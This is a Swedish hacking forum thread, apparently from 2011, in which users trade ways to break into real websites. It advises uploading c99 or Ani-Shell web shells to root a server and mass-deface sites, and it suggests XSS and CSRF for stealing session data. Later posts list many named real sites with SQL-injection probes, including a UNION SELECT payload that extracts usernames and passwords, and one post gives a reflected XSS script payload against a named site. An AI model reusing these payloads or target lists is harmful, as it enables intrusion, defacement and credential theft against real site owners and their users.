2011-08-20, 05:37
  #3229
Medlem
kruximuxzs avatar
Jag har hittat en sida som tillåter användare att länka till sin avatar. Man postar alltså en länk till sin bild. Sidan kollar inte länken dvs jag kan ladda upp .php filer och samma text som går in kommer ut inom förljande tecken src="{avatar}".

Nu vill jag ha tips på vad jag kan göra... det enda jag har lyckats med är att logga ip-adresser men jag vill ha personens användare genom att hämta det via $_SESSION. Hur ska jag gå tillväga? Jag tänker inte länka till hemsidan.
Citera
2011-08-20, 06:56
  #3230
Medlem
jimpss avatar
Citat:
Ursprungligen postat av kruximuxz
Jag har hittat en sida som tillåter användare att länka till sin avatar. Man postar alltså en länk till sin bild. Sidan kollar inte länken dvs jag kan ladda upp .php filer och samma text som går in kommer ut inom förljande tecken src="{avatar}".

Nu vill jag ha tips på vad jag kan göra... det enda jag har lyckats med är att logga ip-adresser men jag vill ha personens användare genom att hämta det via $_SESSION. Hur ska jag gå tillväga? Jag tänker inte länka till hemsidan.

Näe, din PHP-kod kommer ändå inte evalueras, hämtningen sker ju för fan på klientsidan. Vad tänker du med? Det sidan däremot är sårbar mot är CSRF-attacker och möjligen en XSS-injicering.
Citera
2011-08-20, 07:01
  #3231
Medlem
kruximuxzs avatar
Citat:
Ursprungligen postat av jimps
Näe, din PHP-kod kommer ändå inte evalueras, hämtningen sker ju för fan på klientsidan. Vad tänker du med? Det sidan däremot är sårbar mot är CSRF-attacker och möjligen en XSS-injicering.
Tips på något jag ska skriva in i formuläret då...?
Citera
2011-08-20, 07:09
  #3232
Medlem
jimpss avatar
Citat:
Ursprungligen postat av kruximuxz
Tips på något jag ska skriva in i formuläret då...?

Ja, du borde se efter om HTML-entiteter avkodas innan lagring eller före utskrift. Om inte? Grattis! Mycket roligare och framförallt fler möjligheter med XSS istället för CSRF där du är väldigt begränsad.
Citera
2011-08-20, 10:47
  #3233
Bannlyst
Citat:
Ursprungligen postat av kruximuxz
Jag har hittat en sida som tillåter användare att länka till sin avatar. Man postar alltså en länk till sin bild. Sidan kollar inte länken dvs jag kan ladda upp .php filer och samma text som går in kommer ut inom förljande tecken src="{avatar}".

Är du 100% säker på att din kod inte kommer evalueras? Det vet du faktiskt inte förrän du testat. Så ladda upp en bild och se vart den lägger sig, ta sedan bort den och ladda upp ett shell.
/dir/c99.php. Ani-Shell eller c99. Från där kan du roota servern vilket kan leda till massdeface, du kommer (om du har tur) få med dig 20 sidor. Tyvärr så loggas inte lösen och användare på den sortens plattform men du kan få ut mycket mer enligt mig.
Men använd Fiddler för att se om du kan spoofa HTTP Headern då kan du ändra cookies och
annan skit.
Denna metod använde jag på fullylinked.com om ni minns...
https://www.owasp.org/index.php/HTTP_Request_Smuggling
Citera
2011-08-20, 11:09
  #3234
Medlem
Citat:
Ursprungligen postat av RebeccaBlack
Är du 100% säker på att din kod inte kommer evalueras? Det vet du faktiskt inte förrän du testat. Så ladda upp en bild och se vart den lägger sig, ta sedan bort den och ladda upp ett shell.
/dir/c99.php. Ani-Shell eller c99. Från där kan du roota servern vilket kan leda till massdeface, du kommer (om du har tur) få med dig 20 sidor. Tyvärr så loggas inte lösen och användare på den sortens plattform men du kan få ut mycket mer enligt mig.
Men använd Fiddler för att se om du kan spoofa HTTP Headern då kan du ändra cookies och
annan skit.
Denna metod använde jag på fullylinked.com om ni minns...
https://www.owasp.org/index.php/HTTP_Request_Smuggling

Intressant. Hur går du tillväga när du vill kolla proxy-version med fiddler?
Citera
2011-08-20, 11:30
  #3235
Bannlyst
Citat:
Ursprungligen postat av Phinxy
Intressant. Hur går du tillväga när du vill kolla proxy-version med fiddler?
Beror helt på. Men varför skulle jag vilja veta proxy-version när jag ska spoofa en HTTP Request?
Om du vill veta OS eller vilka plattformar en server kör så rekommenderar jag nmap.
Men denna info finns alltså i Headern så det är bara att kolla där under
Headers>Response Headers>Miscellaneous
Citera
2011-08-20, 18:51
  #3236
Medlem
Zaperons avatar
http://www.golfbycarl.se/web/product.php?id=155
http://bilrecension.se/view_review.php?id=32
http://www.uppsala-carolina.se/layout/news.php?id=53
http://www.naturskola.se/popup_lightbox.asp?ID=176
http://www.museum-id.com/tv-detail.asp?newsID=104
Citera
2011-08-20, 19:25
  #3237
Medlem
Zaperons avatar
http://www.hoglandsgymnasierna.nu/skola.asp?skola=70 Fanns rätt mycket där.. Men kunde inte komma åt allt..
Citera
2011-08-20, 19:38
  #3238
Bannlyst
http://ultimateblogger.vibe.com/contest/index.php?content=blogger&id=155
http://www.aor.ca/html/products.php?id=87
http://www.worldstyling.com/web/product_detail.php?id=909
http://www.in-spiros.com/product.php?id=11
http://www.corepad.com/index.php?pagina=artikel&id=12


. .
__________________
Senast redigerad av Anonymous123 2011-08-20 kl. 19:47.
Citera
2011-08-20, 20:37
  #3239
Bannlyst
Suprbits.com Tråden
https://www.flashback.org/t1632658

Deras säkerhet kanske inte är den bästa.
Kod:
http://www.suprbits.com/index.php?pid='
Kod:
http://www.suprbits.com/index.php?search=%3E%22%3E%3Cscript%20%0A%0D%3Ealert%2800%29%3B%3C/script%3E0&gid=0
Fast XSS är non-persistens


http://pastebin.com/NVdCYkq4
Directory Traversal. Trevligt.
Citera
2011-08-21, 20:25
  #3240
Medlem
Rynes avatar
Kod:
http://www.ulliskokobar.se/events.php?eID=09+and+1=2+union+select+0,1,concat_ws(0x3b,user,pass),3+from+user--
http://kindait.se/produkter.php?vala=produkter&valb=visaprod&id=44'
http://www.klemens.dk/nyt/hold/spillerprofil.php?PersonID=12'
http://www.faktiskt.se/wap/?view=topic&topic_id=32367'
http://www.spriddoffentlighet.se/page.php?menuid=6'
http://www.web-me.se/blogg.php?id=1&bid=2'
http://www.kraitz.se/xml/text.php?visa=copy'
http://www.engeltofta.se/?a=54'

http://web.uconn.edu/mailservices/dept.php?sortby=address'
http://web.uconn.edu/transfer/search.php?school=Quinnipiac+University&subject=BI'
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in